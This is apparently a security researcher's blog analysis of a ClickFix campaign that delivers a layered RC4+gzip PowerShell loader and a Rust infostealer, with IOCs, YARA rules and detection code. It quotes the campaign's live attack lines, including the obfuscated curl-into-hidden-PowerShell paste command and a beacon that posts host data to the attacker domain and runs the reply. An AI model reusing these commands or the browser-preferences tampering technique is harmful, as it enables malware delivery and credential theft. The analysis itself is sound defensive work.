Fake captcha, five layers of RC4, and a Rust stealer with LSA session enumeration and AD recon
Five-layer RC4+gzip ClickFix stager drops a Rust infostealer with browser extension force-install, LSA session enumeration, and AD recon via NetAPI.
The views and opinions expressed in this post are my own and do not represent those of my employer. This is a personal blog where I share research and things I’m learning.
TL;DR
ClickFix campaign delivering a five-layer RC4+gzip PowerShell loader from captcha-code[.]lol. Final payloads: an 8 MB Rust infostealer that force-installs a malicious browser extension across six browsers, enumerates every LSA logon session, and performs full AD user/group recon via NetAPI; and a custom PIC shellcode loader with a runtime-encrypted inner payload (family not recovered statically). C2: 94.154.32[.]21:8080 (Rust stealer), 87.232.123[.]174:80 (shellcode branch). C2 panel named Lunex, bilingual EN/RU.

If this is your fleet, do these first:

- Enable PowerShell Script Block Logging (Event ID 4104) and alert on the RC4 PRGA string `-bxor $S[($S[$i]+$S[$j])%256]`
- Audit browser extensions on all endpoints – compare against an approved baseline; anything added outside a deployment window is suspicious
- Hunt Run key: `HKCU\...\CurrentVersion\Run`, value `ibrowser`
- Block: captcha-code[.]lol, ziemaen[.]lol, 94.154.32[.]21:8080, 87.232.123[.]174:80

Full IOC table and YARA rules at the bottom of this post.
So someone pasted a command they shouldn’t have
A Defender alert fires on a host. The user says they were trying to verify a captcha. You pull the process tree and find cmd.exe spawning curl.exe which pipes into a hidden powershell.exe, which then downloads five more scripts before reaching into the registry and dropping two payloads.
That’s ClickFix – and this one had more going on than it first appeared: a Rust stealer that force-installs a malicious browser extension (bypassing Chrome’s Secure Preferences HMAC protection), enumerates every active Windows logon session via LSA APIs, and performs full Active Directory user and group recon. There was also a fully bilingual Russian/English C2 panel with live remote browser control, exposed on port 8000 and visible via OSINT.
This post walks through how I peeled the whole chain statically, what the payloads actually do, and – most importantly – what you can do to stop the next one.
The attack at a glance
1. Lure captcha-code[.]lol -> fake captcha -> user pastes command
2. Launcher cmd /v:on /k -> wildcard obfuscation -> curl | powershell -w hidden
3. Staging Five nested RC4+gzip layers, each IEX'd in memory (main.ps1)
4. Recon 50-tool sandbox check; host fingerprint beacon to /m
5. Routing WORKGROUP tag (ABCD111) vs domain tag (BCDA222) -> different payload
6. Payload A Rust infostealer update.exe: force extension, LSA session enum, AD recon, persist
7. Payload B data.bin: custom PIC shellcode loader, inner payload runtime-encrypted
Two different final payloads, same infrastructure, operator picks based on whether you’re a consumer or a corporate target.
How it works
The launcher: obfuscating the obvious
The pasted command is ugly on purpose:
cmd /v:on /k "set x=where c*u*r*l.e?e&set y=where p*ell.exe&for /f %i in ('where c*d.e?e')do %i /c "for /f %k in ('!x!')do %k https://captcha-code[.]lol/o|for /f %j in ('!y!')do %j -WindowStyle Hidden""
Stripped of the noise, it’s just:
curl https://captcha-code[.]lol/o | powershell -WindowStyle Hidden
The where c*u*r*l.e?e wildcard trick resolves curl.exe at runtime, bypassing simple string detection. The cmd /v:on enables delayed variable expansion so !x! and !y! expand inside the inner shell. It’s a neat little sidestep – and increasingly common in ClickFix campaigns. Using curl.exe to pull the first-stage payload is a living-off-the-land technique – the binary ships with Windows, is trusted by most AV, and sidesteps rules that scan for known-bad executables.
Five layers of RC4 + gzip: Russian dolls
The downloaded main.ps1 looks intimidating but follows a pattern. Each layer is the same wrapper:
- A long Base64 string (the next payload)
- A `[byte[]]@(...)` array (the RC4 key)
- An inline RC4 routine
- GZip decompression
- `Invoke-Expression` – written as `'I'+'nv'+'ok'+'e-E'+'xpr'+'ess'+'ion'` to avoid string matching
Each decoded layer contains the same structure, one level deeper. Five times. The whole thing peels in about 20 lines of Python – RC4 is fast to implement and fast to reverse.
```python
import re, base64, gzip

def rc4(data, key):
    # Key-scheduling algorithm (KSA)
    S = list(range(256)); j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    # Pseudo-random generation algorithm (PRGA), XORed over the data
    i = j = 0; out = bytearray()
    for b in data:
        i = (i + 1) % 256; j = (j + S[i]) % 256; S[i], S[j] = S[j], S[i]
        out.append(b ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

ps = open("main.ps1").read()
while True:
    # The longest quoted Base64 string is the next layer; the [byte[]]@(...) array is its RC4 key
    blob = max(re.findall(r'"([A-Za-z0-9+/=]{200,})"', ps), key=len, default=None)
    keym = re.search(r'\[byte\[\]\]@\(([\d,\s]+)\)', ps)
    if not blob or not keym: break
    key = bytes(int(x) for x in keym.group(1).split(','))
    dec = rc4(base64.b64decode(blob), key)
    assert dec[:2] == b'\x1f\x8b', 'not gzip: wrong key or wrong blob'  # gzip magic check
    ps = gzip.decompress(dec).decode('utf-8', 'replace')
    if '[byte[]]@(' not in ps: break  # no further key array: this is the final stage
```
The RC4 output starts 1f 8b each layer – the gzip magic bytes – which is a nice validation that you’ve got the right key.
Anti-analysis: 50 tools, one exit
The final decoded stage checks for ~50 running processes before doing anything:
```powershell
$aoy = @('wireshark','x64dbg','ghidra','ida','processhacker','procmon','sysmon',
         'fiddler','sandboxie','vmware','virtualbox','qemu-ga','prl_cc', ...)
Get-Process | ForEach-Object {
    foreach ($t in $aoy) { if ($_.Name.ToLower() -like "*$t*") { exit } }
}
```
The list includes qemu-ga (QEMU guest agent) and prl_cc (Parallels Tools) – this isn’t a generic list, someone maintains it. The tool names themselves are obfuscated in the script via single-byte XOR and Base64; I decoded them statically with Python.
The beacon: the operator knows where you work
After the sandbox check, the script reads your domain membership and AV products:
```powershell
$domain = (Get-CimInstance Win32_ComputerSystem).Domain
if ($domain -eq 'WORKGROUP') {
    # tag: ABCD111 -- consumer
    iwr 'https://captcha-code[.]lol/m' -Method POST -Body @{message="ABCD111`n<AV>"} | iex
} else {
    # tag: BCDA222 -- domain-joined corporate victim
    $dcCount = (net group "Domain Computers" /domain | Select-String '\$').Count * 3
    iwr 'https://captcha-code[.]lol/m' -Body @{message="BCDA222`nAV: $av`n| $domain |`nAD: $dcCount"} | iex
}
```
The response to that POST is piped straight to iex – the server decides what you get based on which tag you sent. Domain-joined victims also hand over a rough domain computer count before receiving their payload. I sent fabricated data to the /m endpoint; the domain branch returned a 520 error (operator’s origin was down), so the enterprise payload isn’t in this report.
The Rust infostealer: update.exe
The workgroup branch eventually drops an 8 MB Rust binary. It targets six browsers – Chrome, Edge, Opera, Brave, Vivaldi, and Arc – and goes after passwords, cookies, autofill data, and credit cards.
Browser credential collection – extension-based, not DPAPI. Instead of decrypting cookies from disk, the stealer installs a malicious browser extension across all six browsers. The install path:
- Finds all Chrome/Edge/Opera/Brave/Vivaldi/Arc profile directories (all six path patterns are hardcoded in one string)
- Tampers with `Secure Preferences` for each profile: enables developer mode (so unsigned extensions load), adds the attacker’s extension to the approved list
- Bypasses the `developer_mode_encrypted_hash` guard – a salted hash Chrome 45+ introduced specifically to detect developer mode tampering
- Re-computes the `protection.macs`/`super_mac` HMAC fields using the `hmac-sha256` crate so Chrome accepts the modified file
- Drops and activates the extension
Once that extension is running inside the browser’s own process, it calls chrome.cookies and gets cookies in cleartext – the browser hands them over because it trusts the extension. No DPAPI. Chrome’s disk-level cookie encryption is entirely bypassed because the extension never touches the encrypted file. A successful install is confirmed in the binary by the literal string "Successfully installed extension in N profile(s)".
The C2 panel can then push JavaScript to inject into specific websites, redirect domains, capture screenshots, and give the operator live remote browser control via WebSocket.
LSA session enumeration. The import table reveals three functions from secur32.dll: LsaEnumerateLogonSessions, LsaGetLogonSessionData, and LsaFreeReturnBuffer. These are direct Windows API calls, not string-table noise. Together they enumerate every active logon session on the host and retrieve per-session credential metadata – this is the same mechanism used by credential-dumping tools like Mimikatz’s sekurlsa::logonsessions. The binary also imports OpenProcessToken and GetTokenInformation from advapi32.dll for privilege checking. This is a significant capability that was not apparent from the browser-extension focus: the stealer may be harvesting session tokens from all authenticated users on the machine, not just the one running the browser.
Active Directory enumeration. Five functions from netapi32.dll appear in the import table: NetUserEnum, NetUserGetInfo, NetUserGetLocalGroups, NetGroupEnum, and NetGroupGetInfo. This gives the stealer a full-fidelity map of domain users, their group memberships, and local group assignments – standard AD reconnaissance. Whether the operator uses this data to target lateral movement or simply to profile the environment isn’t clear, but the capability is there.
AV enumeration via hidden PowerShell. The binary spawns a fully hidden PowerShell subprocess to query installed AV products:
```powershell
powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command
    Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct |
    Select-Object -ExpandProperty displayName
```
The binary also calls CoCreateInstance, CoSetProxyBlanket, and CoInitializeSecurity for direct WMI COM access, so WMI queries extend beyond just AV enumeration.
The embedded config gives away the C2:
```json
{
  "api_url": "http://94.154.32[.]21:8080",
  "api_key": "eeb547f4dd3ba851526e1e3c6d1ae7a5256b46d988bf40710c731a107d670550",
  "auto_install": true,
  "telegram_enabled": false
}
```
The Telegram token is empty here – provisioned per-victim from the C2 at check-in, so the operator can redirect exfil to any bot without recompiling. The build path in the binary leaks /Users/chapter/.cargo/registry/ – username chapter is a useful cross-sample correlation pivot.
The C2 panel: Lunex
Port 8000 on the same server hosts a React SPA named Lunex – a bilingual English/Russian C2 panel (over 100 natively-authored Russian UI strings, listed language options are English and Русский). OSINT on the C2 infrastructure gave a clear picture of the panel’s capabilities. From the compiled JS bundle I extracted the full operator command set: arbitrary JavaScript injects into URL-matched pages, domain spoofing/substitution, live WebSocket remote browser control, screenshots, tab snapshots, push notifications. The extension is the delivery mechanism for all of it.
The panel was created 2026-06-04. ziemaen[.]lol (the EXE drop domain) was registered the next day. The victim was hit on 2026-06-10. Six days from infrastructure setup to active campaign.
Techniques observed (MITRE ATT&CK)
The following techniques have been mapped to MITRE ATT&CK for future reference.
| Tactic | Technique | ATT&CK ID | What it did |
|---|---|---|---|
| Initial Access | User Execution: Malicious Link | T1204.002 | ClickFix fake captcha |
| Defense Evasion | Obfuscated Files / Deobfuscate | T1027 / T1140 | Wildcard cmd, RC4+gzip, concat IEX |
| Defense Evasion | Sandbox/VM evasion | T1497.001 | 50-tool process check |
| Discovery | System Info / Domain Trust | T1082 / T1018 | Domain, AV, DC count |
| Discovery | Domain Account enumeration | T1087.002 | NetUserEnum/NetGroupEnum AD recon |
| Discovery | Software Discovery: Security Software | T1518.001 | Hidden PowerShell -> AntiVirusProduct WMI query |
| Command & Control | Web protocols | T1071.001 | POST beacon -> iex response |
| Execution | Reflective code loading | T1620 | $shellcodeDelegate.Invoke() |
| Execution | Native API | T1106 | LSA session enumeration via LsaEnumerateLogonSessions |
| Credential Access | Credentials from browsers | T1555.003 | Malicious extension harvests cookies via browser APIs |
| Credential Access | OS Credential Dumping: LSA Secrets | T1003.004 | LsaEnumerateLogonSessions/LsaGetLogonSessionData on all active sessions |
| Persistence | Browser extensions | T1176 | Secure Preferences HMAC tamper |
| Persistence | Registry Run keys | T1547.001 | ibrowser value |
| Exfiltration | Exfil over web / Telegram | T1041 / T1567.002 | C2 HTTP + Telegram bot |
Why this matters
The LSA session enumeration is the thing I’d flag hardest. LsaEnumerateLogonSessions + LsaGetLogonSessionData hit every active logon session on the machine – not just the current user’s browser. If a service account, a domain admin, or a shared terminal session is logged in, the stealer can see it. Combined with the AD user and group enumeration via NetAPI, the operator gets both a live session inventory and a full map of domain accounts and their group memberships. That’s reconnaissance infrastructure, not just a cookie stealer.
The browser extension adds a second dimension: even after you’ve cleaned the EXE, the extension might still be running in the browser, injecting JavaScript into pages and streaming data back. Any browser session on that host – banking, corporate SSO, email – should be considered compromised until the extension is verified removed.
The domain-gating means if you’re on a corporate network, you might be getting a heavier payload than what I captured here – the consumer branch (this sample) already has AD enumeration built in; the enterprise branch payload is still unknown.
I’m not going to speculate on who’s behind this. The Russian-language panel, Ukrainian hosting, and tight operational timeline are interesting data points, but they’re not attribution – they’re clustering signals.
What defenders can do
| Technique (ATT&CK) | What to do | Essential Eight | What to hunt for |
|---|---|---|---|
| ClickFix paste-and-run (T1204.002) | Application Control prevents the piped script from executing; User App Hardening blocks cmd /v:on in non-admin contexts | Application Control (L1+); User Application Hardening | 4688: cmd.exe spawning curl.exe then powershell.exe; any powershell -w h with stdin from pipe |
| RC4+gzip PS loader (T1027/T1140) | PowerShell Constrained Language Mode disables the [byte[]], [Convert], and inline-class constructs the loader depends on | Application Control | 4104 Script Block Logging: RC4 PRGA loop or IO.Compression.GzipStream in a script |
| Browser extension force-install (T1176) | Chrome enterprise policy ExtensionInstallAllowlist; baseline approved extension IDs and alert on additions; User App Hardening for browser configuration | Application Control; User Application Hardening | New files under %LOCALAPPDATA%\...\Extensions\; Secure Preferences write outside a Chrome process; Chrome developer mode warnings appearing without user action |
| LSA session enumeration (T1003.004 / T1106) | Enable LSA Protection (RunAsPPL) to block non-PPL processes from calling LSA APIs; Credential Guard prevents cached credential access | Restrict Administrative Privileges; Patch Operating Systems | Sysmon Event ID 10: process access to lsass.exe from non-system processes; Windows Security Event 4624/4634 for unexpected logon session creation |
| AD user/group enumeration (T1087.002) | Audit LDAP/Kerberos query volume per host; flag endpoints calling NetUserEnum or NetGroupEnum against a DC – workstations don’t normally do this | Restrict Administrative Privileges | Security Event 4661 on directory objects; Sysmon network connections to DC port 389/636/445 from non-DC hosts |
| Run-key persistence (T1547.001) | Application Control still blocks the payload; baseline HKCU\...\Run and alert on new values | Restrict Administrative Privileges; Application Control | Sysmon Event ID 13 (registry value set) on CurrentVersion\Run; specifically value name ibrowser |
ClickFix and the loader chain. The most effective control is also the broadest: Application Control. If powershell.exe can’t run arbitrary downloaded scripts, the entire RC4+gzip chain stalls at the first layer. See Implementing Application Control (ASD/ACSC, November 2023) for the per-level requirements. The immediate detection is PowerShell Script Block Logging – Event ID 4104 records the decoded script body regardless of how it was encoded on disk. If you’re not already capturing 4104, this investigation is a good reason to start. The RC4 PRGA string (-bxor $S[($S[$i] + $S[$j]) % 256]) is distinctive enough to alert on directly.
The browser extension force-install. The stealer doesn’t need to touch Chrome’s cookie encryption at all – it installs an extension that runs inside the browser and gets cookies in cleartext via the browser’s own APIs. Chrome’s enterprise policy ExtensionInstallAllowlist and ExtensionInstallBlocklist are the controls here. If you manage a fleet, maintaining a list of approved extension IDs and alerting on anything outside it is the detection. Chrome will also display a developer mode warning when unpacked extensions are loaded – if users are seeing that banner without having installed anything, that’s your signal. This is also the persistence mechanism that survives a simple file-cleanup: if a host ran this stealer, checking browser extensions isn’t optional. See Hardening Microsoft Windows 11 Workstations (ASD/ACSC, September 2025) for the browser hardening guidance, and Application Control to prevent the binary from running in the first place.
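The baseline check described above, as an added example written for this post (not the stealer’s code and not the companion repo’s rules). It audits one profile’s Secure Preferences against an approved extension list; the JSON fragment and the allowlist are constructed, and the "absolute path means unpacked" rule is a heuristic I’m assuming, not a documented Chrome contract.

```python
import json
import re
from typing import Dict, Iterable, List

# Constructed Secure Preferences fragment (not a file from the sample): one store extension
# plus an unpacked one, with developer mode switched on as the stealer leaves it. Real files
# carry many more keys; only those this check reads are included.
SAMPLE_SECURE_PREFS = json.dumps({
    "extensions": {
        "ui": {"developer_mode": True},
        "settings": {
            "nmmhkkegccagdldgiimedpiccmgmieda": {"path": "nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0_0", "state": 1},
            "abcdefghijklmnopabcdefghijklmnop": {"path": "C:\\Users\\victim\\AppData\\Roaming\\ext", "state": 1},
        },
    },
    "protection": {"macs": {}, "super_mac": "<omitted>"},
})

# Approved baseline (constructed). In a fleet this comes from your deployment records.
APPROVED_EXTENSIONS = {"nmmhkkegccagdldgiimedpiccmgmieda"}

# Heuristic (assumption): store installs record a path relative to the Extensions directory,
# while unpacked extensions record an absolute path to wherever they were dropped.
ABS_PATH = re.compile(r"^(?:[A-Za-z]:\\|/)")


def audit_secure_prefs(raw: str, approved: Iterable[str]) -> Dict[str, List[str]]:
    """Return findings for one profile's Secure Preferences JSON."""
    prefs = json.loads(raw)
    ext = prefs.get("extensions", {})
    findings: Dict[str, List[str]] = {"developer_mode": [], "unapproved": [], "unpacked": []}
    # Developer mode enabled without an engineer's involvement is the banner the text describes
    if ext.get("ui", {}).get("developer_mode") is True:
        findings["developer_mode"].append("extensions.ui.developer_mode is true")
    for ext_id, info in ext.get("settings", {}).items():
        if ext_id not in approved:
            findings["unapproved"].append(ext_id)
        if ABS_PATH.match(str(info.get("path", ""))):
            findings["unpacked"].append(ext_id)
    return findings


def is_suspicious(findings: Dict[str, List[str]]) -> bool:
    """Any finding at all warrants a look at the host."""
    return any(findings.values())


if __name__ == "__main__":
    print(json.dumps(audit_secure_prefs(SAMPLE_SECURE_PREFS, APPROVED_EXTENSIONS), indent=2))
```

Run it per profile directory for each of the six browsers the stealer targets; a clean host returns empty lists for all three keys.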
LSA session enumeration. The binary calls LsaEnumerateLogonSessions and LsaGetLogonSessionData directly – no lsass.exe memory read required, just an API call. The defensive controls are LSA Protection (HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL = 1), which prevents non-PPL processes from making those calls, and Windows Defender Credential Guard, which protects credential material at a hypervisor level. Detection: Sysmon Event ID 10 capturing process access to lsass.exe, and baselining Windows Security Events 4624/4634 to catch unexpected logon session activity. Any non-system process on a workstation calling into secur32!LsaEnumerateLogonSessions is worth investigating.
Active Directory enumeration via NetAPI. A workstation calling NetUserEnum against a domain controller is unusual – it’s the kind of thing a domain controller or management tool does, not an endpoint. Detection opportunities include Security Event 4661 (handle requested on directory service objects), and monitoring network connections from workstations to DC ports 389/636/445 for high-volume query patterns. If you have LDAP query logging enabled on your DCs (Directory Service audit category), bulk user/group enumeration from non-server hosts will stand out quickly.
The Run key. The ibrowser value in HKCU\...\CurrentVersion\Run is the persistence mechanism for the EXE branch. It’s detectable via registry auditing (Sysmon Event ID 13) and, if you have autoruns baselining in your EDR, it’ll fire there too. This is one of the easiest detections to add if you don’t have it: alert on new values added to CurrentVersion\Run on endpoints, especially outside a software deployment window.
Hunting and detection summary
- Event ID 4104: RC4 PRGA string `-bxor $S[($S[$i] + $S[$j]) % 256]`; `IO.Compression.GzipStream`; domain captcha-code[.]lol
- Event ID 4688 / Sysmon 1: `cmd.exe` -> `curl.exe` -> `powershell.exe` (stdin pipe); `powershell.exe` -> `net.exe` querying "Domain Computers"; unsigned PE from `%TEMP%`; `powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden` spawned by a non-shell parent
- Sysmon 10 (process access): any non-system process opening a handle to `lsass.exe` – specifically workstations calling into `secur32.dll` LSA APIs
- Sysmon 13 / Registry: new value `ibrowser` in `HKCU\...\CurrentVersion\Run`
- Windows Security 4624/4634: unexpected logon session creation not matching an interactive or service login pattern
- Windows Security 4661 / DC LDAP audit: high-volume `NetUserEnum`/`NetGroupEnum` equivalent queries from a workstation source IP
- File: `%APPDATA%\Roaming\OFFICE\data.bin`; `%TEMP%\u.exe`; new directories in browser extension paths; `Secure Preferences` written by a non-browser process
- Network: `POST` to `/api/v1/checkin` with JSON containing `computer_name`, `mac_address`, `is_admin`; outbound TCP to 94.154.32[.]21:8080; `api.telegram[.]org/bot` egress from non-browser processes; outbound to captcha-code[.]lol, ziemaen[.]lol; workstation -> DC port 389/636/445 for high-volume queries
- Beacon tells: HTTP POST body containing literal string `ABCD111` or `BCDA222`
The YARA rules, Sigma detections, KQL queries, and IOC list for this campaign are also available in the companion detection repo.
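A first-pass triage of the event sources in the summary above, as an added example written for this post rather than a rule from the companion repo. The event records are constructed samples with simplified field names (`parent`, `image`, `cmdline`, `target`), not real telemetry; the PRGA regex deliberately tolerates renamed variables and missing whitespace, since the loader uses both the spaced and unspaced forms of the same expression.

```python
import re
from typing import Dict, List, Tuple

# 4104 script-block artefacts from the loader chain
RC4_PRGA = re.compile(
    r"-bxor\s*\$\w+\[\s*\(\s*\$\w+\[\s*\$\w+\s*\]\s*\+\s*\$\w+\[\s*\$\w+\s*\]\s*\)\s*%\s*256\s*\]",
    re.IGNORECASE)
GZIP_STREAM = re.compile(r"IO\.Compression\.GzipStream", re.IGNORECASE)
SPLIT_IEX = re.compile(r"'I'\s*\+\s*'nv'\s*\+\s*'ok'", re.IGNORECASE)
# 4688 command-line tell: -WindowStyle Hidden, including the short form "-w h"
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.IGNORECASE)
# Sysmon 13 target path under the Run key; captures the value name
RUN_KEY = re.compile(r"\\CurrentVersion\\Run\\([^\\]+)$", re.IGNORECASE)

# Constructed sample events (not real logs) covering the chain and one benign control per source
SAMPLE_EVENTS: List[Dict] = [
    {"id": 4104, "script": "$o += $b -bxor $S[($S[$i] + $S[$j]) % 256]"},
    {"id": 4104, "script": "$g = New-Object IO.Compression.GzipStream($ms, [IO.Compression.CompressionMode]::Decompress)"},
    {"id": 4104, "script": "Get-ChildItem C:\\Temp | Measure-Object"},
    {"id": 4688, "parent": "C:\\Windows\\System32\\cmd.exe", "image": "C:\\Windows\\System32\\curl.exe",
     "cmdline": "curl https://captcha-code.lol/o"},
    {"id": 4688, "parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "powershell -WindowStyle Hidden"},
    {"id": 4688, "parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "powershell -NoProfile -File build.ps1"},
    {"id": 13, "target": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ibrowser",
     "details": "C:\\Users\\victim\\AppData\\Local\\Temp\\u.exe"},
]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def check_event(ev: Dict) -> List[str]:
    """Return the names of every rule the event trips (empty list = nothing of interest)."""
    hits: List[str] = []
    if ev["id"] == 4104:
        body = ev.get("script", "")
        if RC4_PRGA.search(body):
            hits.append("ps_rc4_prga")
        if GZIP_STREAM.search(body):
            hits.append("ps_gzipstream")
        if SPLIT_IEX.search(body):
            hits.append("ps_split_iex")
    elif ev["id"] == 4688:
        image, parent = basename(ev.get("image", "")), basename(ev.get("parent", ""))
        cmd = ev.get("cmdline", "")
        if image == "powershell.exe" and parent == "cmd.exe" and HIDDEN_WINDOW.search(cmd):
            hits.append("cmd_spawns_hidden_powershell")
        if image == "curl.exe" and parent == "cmd.exe":
            hits.append("cmd_spawns_curl")  # lower confidence on its own; strong next to the PowerShell hit
    elif ev["id"] == 13:
        m = RUN_KEY.search(ev.get("target", ""))
        if m:
            hits.append("run_key_value_set")  # any new Run value is worth a look
            if m.group(1).lower() == "ibrowser":
                hits.append("run_key_ibrowser")  # the specific value this campaign uses
    return hits


def scan(events: List[Dict]) -> List[Tuple[int, str]]:
    """(event index, rule name) for every hit across a batch of events."""
    return [(i, h) for i, ev in enumerate(events) for h in check_event(ev)]


if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```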
Indicators of Compromise
| Type | Indicator | Notes |
|---|---|---|
| Domain | captcha-code[.]lol | ClickFix lure + staging |
| Domain | ziemaen[.]lol | EXE drop host |
| IP:port | 87.232.123[.]174:80 | Flask shellcode C2 |
| IP:port | 94.154.32[.]21:8080 | Rust stealer C2 |
| Domain | 9sxbhphss8kiyk2[.]top | Stage-7 (dead at time of analysis) |
| Domain | hfpfhy7zytroclo[.]top | Stage-7 (NXDOMAIN at time of analysis) |
| Domain | v4bdhuudd0n353v[.]top | Stage-7 (dead at time of analysis) |
| SHA256 | ff2f74cc198a07ea7bf4457dd9e5c0e0adc5b073b5e50d4f13d32b753d7be744 | main.ps1 stage 1 |
| SHA256 | bc25823b5a15b3fd607eba3e716d4bfab05391bc3a73c7603fba5d43ee25deab | wgr.ps1 workgroup stage |
| SHA256 | 4dd1f15776d78f82f2ee8dcf661e6d2431d9140e1b5b89b699e06d1e11712cdc | script.ps1 Flask branch stage |
| SHA256 | 372df5bac7bce42e403cd024589eec0f76c2b3ed92bd30a5cb34948a0662c2a1 | update.exe Rust stealer |
| SHA256 | 475a242cdd832aa43b562ffb6abf3fee1e7f0479425b9c00434a4a44b5c60f14 | data.bin shellcode (XOR 0x3B encrypted on disk) |
| File | %APPDATA%\Roaming\OFFICE\data.bin | Shellcode staging path |
| File | %TEMP%\u.exe | Dropped stealer copy |
| Registry | HKCU\...\CurrentVersion\Run\ibrowser | Stealer persistence |
| Campaign GUID | 580e250d-effb-401a-b981-fb7fd80635a2 | ?s= param across all stage-7 URLs |
| API key | eeb547f4dd3ba851526e1e3c6d1ae7a5256b46d988bf40710c731a107d670550 | Hardcoded in stealer binary |
| Panel | 94.154.32[.]21:8000 | Lunex C2 panel |
Detection rules
```yara
rule ClickFix_CaptchaCode_PS_Loader
{
    meta:
        author = "Luke Wilkinson"
        date = "2026-06-11"
        description = "ClickFix RC4+GZip PowerShell loader (captcha-code[.]lol)"
    strings:
        $rc4 = "-bxor $S[($S[$i] + $S[$j]) % 256]" ascii
        $gz = "IO.Compression.GzipStream" ascii
        $iex = "'I' + 'nv' + 'ok' + 'e-E' + 'xpr' + 'ess' + 'ion'" ascii
        $junk = "Random junk" ascii
        $beac = "captcha-code.lol" ascii
        $tagA = "ABCD111" ascii
        $tagB = "BCDA222" ascii
    condition:
        2 of ($rc4,$gz,$iex,$junk) or $beac or any of ($tagA,$tagB)
}

rule Stealer_Rust_chapter_BrowserExt
{
    meta:
        author = "Luke Wilkinson"
        date = "2026-06-11"
        description = "Rust infostealer: extension force-install + LSA enum (captcha-code[.]lol campaign)"
    strings:
        $dev = "/Users/chapter/.cargo/registry" ascii
        $pref = "src/internal/secureprefs" ascii
        $reg = "ibrowser" ascii
        $chk = "/api/v1/checkin" ascii
        $lsa = "LsaEnumerateLogonSessions" ascii
        $mz = { 4D 5A }
    condition:
        $mz at 0 and 2 of ($dev,$pref,$reg,$chk,$lsa)
}
```
Closing
The LSA session enumeration is the part I keep coming back to. A stealer that enumerates every active logon session on the machine – not just the browser user’s session – has a much broader blast radius than the “browser credential stealer” label implies. Combined with full AD user and group enumeration, the operator has everything they need to profile an environment for follow-on access. It doesn’t read as opportunistic; it reads as deliberate capability.
The strongest takeaway from this whole chain is still the one that sounds the most boring: Application Control and PowerShell Constrained Language Mode would have stopped this at layer one, before any of the clever stuff got to run. The Secure Preferences HMAC tamper, the LSA API calls, the NetAPI AD enumeration – none of it matters if the RC4+gzip stager can’t Invoke-Expression its way to the next stage.
Enable Script Block Logging if you haven’t. Baseline your browser extensions. Enable LSA Protection. Keep that autoruns alert ticking.
Stay curious.
On methodology: the investigation is mine. The reverse engineering and analysis assembly were carried out with AI workflows (Claude, primarily). I reviewed every finding. Errors are mine - ping me on X or Instagram if you spot something off.
References
- MITRE ATT&CK: T1204.002, T1027, T1140, T1497.001, T1082, T1018, T1087.002, T1518.001, T1071.001, T1620, T1106, T1555.003, T1003.004, T1176, T1547.001, T1041, T1567.002
- Implementing Application Control (ASD/ACSC, November 2023)
- Restricting Administrative Privileges (ASD/ACSC, November 2023)
- Hardening Microsoft Windows 11 Workstations (ASD/ACSC, September 2025)
- ISM Guidelines for System Hardening (ASD/ACSC, June 2025)
- Essential Eight Maturity Model (ASD/ACSC, November 2023)